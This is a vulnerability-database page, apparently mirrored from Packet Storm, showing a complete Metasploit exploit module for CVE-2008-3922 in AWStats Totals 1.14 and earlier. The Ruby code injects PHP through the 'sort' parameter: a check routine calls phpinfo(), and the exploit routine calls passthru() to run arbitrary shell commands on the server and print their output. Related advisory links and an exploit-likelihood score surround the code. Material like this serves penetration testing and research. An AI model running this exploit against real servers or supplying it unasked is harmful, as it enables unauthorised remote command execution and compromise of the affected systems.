Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormPatrick WebsterPACKETSTORM:101698
HistoryMay 26, 2011 - 12:00 a.m.

AWStats Totals 1.14 Remote Command Execution

2011-05-2600:00:00
Patrick Webster
packetstormsecurity.com
20

EPSS

0.962

Percentile

99.5%

JSON
`##  
# $Id: awstatstotals_multisort.rb 12715 2011-05-25 10:45:36Z patrickw $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'AWStats Totals =< v1.14 multisort Remote Command Execution',  
'Description' => %q{  
This module exploits an arbitrary command execution vulnerability in the  
AWStats Totals PHP script. AWStats Totals version v1.0 - v1.14 are vulnerable.  
},  
'Author' => [ 'patrick' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 12715 $',  
'References' =>  
[  
['CVE', '2008-3922'],  
['OSVDB', '47807'],  
['BID', '30856'],  
['URL', 'http://userwww.service.emory.edu/~ekenda2/EMORY-2008-01.txt'],  
],  
'Privileged' => false,  
'Payload' =>  
{  
'DisableNops' => true,  
'Space' => 512,  
'Compat' =>  
{  
'PayloadType' => 'cmd',  
'RequiredCmd' => 'generic perl ruby bash telnet',  
}  
},  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Targets' => [[ 'Automatic', { }]],  
'DisclosureDate' => 'Aug 26 2008',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('URI', [true, "The full URI path to awstatstotals.php", "/awstatstotals/awstatstotals.php"]),  
], self.class)  
end  
  
def check  
res = send_request_cgi({  
'uri' => datastore['URI'],  
'vars_get' =>  
{  
'sort' => '"].phpinfo().exit().$a["'  
}  
}, 25)  
  
if (res and res.body.match(/localhost/))  
return Exploit::CheckCode::Vulnerable  
end  
  
return Exploit::CheckCode::Safe  
end  
  
def exploit  
command = Rex::Text.uri_encode(payload.encoded)  
sploit = datastore['URI'] + '?sort="].passthru(\'echo%20YYY;' + command + ';echo%20YYY;\').exit().%24a["'  
  
res = send_request_raw({  
'uri' => sploit,  
'method' => 'GET',  
'headers' =>  
{  
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',  
'Connection' => 'Close',  
}  
}, 25)  
  
if (res)  
print_status("The server returned: #{res.code} #{res.message}")  
  
m = res.body.match(/YYY\n(.*)\nYYY/m)  
  
if (m)  
print_status("Command output from the server:")  
print("\n" + m[1] + "\n\n")  
else  
print_status("This server may not be vulnerable")  
end  
else  
print_status("No response from the server")  
end  
end  
  
end  
  
`

Related

cve 1
openvas 1
prion 1
dsquare 1
checkpoint_advisories 1
cvelist 1
nessus 1
nvd 1
nmap 1
cve
cve
CVE-2008-3922
2008-09-04 18:41:00
openvas
openvas
AWStats Totals 'sort' Parameter RCE Vulnerabilities
2011-06-07 00:00:00
prion
prion
Code injection
2008-09-04 18:41:00
dsquare
dsquare
Awstats Totals <= 1.14 RCE
2012-01-26 00:00:00
checkpoint_advisories
checkpoint_advisories
AWStats Totals awstatstotals.php sort Parameter Code Execution (CVE-2008-3922)
2016-04-03 00:00:00
cvelist
cvelist
CVE-2008-3922
2008-09-04 18:00:00
nessus
nessus
AWStats Totals awstatstotals.php multisort() Function sort Parameter Arbitrary PHP Code Execution
2008-08-27 00:00:00
nvd
nvd
CVE-2008-3922
2008-09-04 18:41:00
nmap
nmap
http-awstatstotals-exec NSE Script
2011-08-23 06:29:12

EPSS

0.962

Percentile

99.5%

JSON
Related for PACKETSTORM:101698
cve1openvas1prion1dsquare1checkpoint_advisories1cvelist1nessus1nvd1nmap1